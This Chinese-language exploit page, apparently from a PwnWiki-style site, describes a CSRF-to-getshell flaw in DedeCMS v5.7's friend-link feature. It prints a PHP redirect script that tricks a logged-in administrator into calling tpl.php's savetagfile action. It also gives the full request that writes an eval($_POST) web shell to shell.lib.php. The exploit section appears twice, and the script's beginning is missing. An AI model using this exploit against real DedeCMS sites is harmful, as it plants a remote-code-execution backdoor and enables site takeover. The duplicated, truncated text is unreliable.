DedeCMS_v5.7_友情鏈接CSRF_GetShell漏洞

# DedeCMS v5.7 友情鏈接CSRF GetShell漏洞

==漏洞利用==

![](/static/pwnwiki/img/Apply.png )

![](/static/pwnwiki/img/Edit.png )

dedecms_csrf.php 的內容如下:
';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
header("location: ".$url);
exit();
管理員:

![](/static/pwnwiki/img/Link_list.png )

由於友鏈中使用了header 跳轉,所以結果其實是訪問了

http://localhost/DedeCMS/DedeCMS-V5.7-GBK-SP2-20170315/uploads/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?@eval($_POST[%27c%27]);?%3E&filename=shell.lib.php

請求。

shell.lib.php:

![](/static/pwnwiki/img/Shell.png )

==漏洞利用==

![](/static/pwnwiki/img/Apply.png )

![](/static/pwnwiki/img/Edit.png )


dedecms_csrf.php 的內容如下:
';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
header("location: ".$url);
exit();

管理員:

![](/static/pwnwiki/img/Link_list.png )


由於友鏈中使用了header 跳轉,所以結果其實是訪問了

http://localhost/DedeCMS/DedeCMS-V5.7-GBK-SP2-20170315/uploads/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?@eval($_POST[%27c%27]);?%3E&filename=shell.lib.php

請求。

shell.lib.php:

![](/static/pwnwiki/img/Shell.png )

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容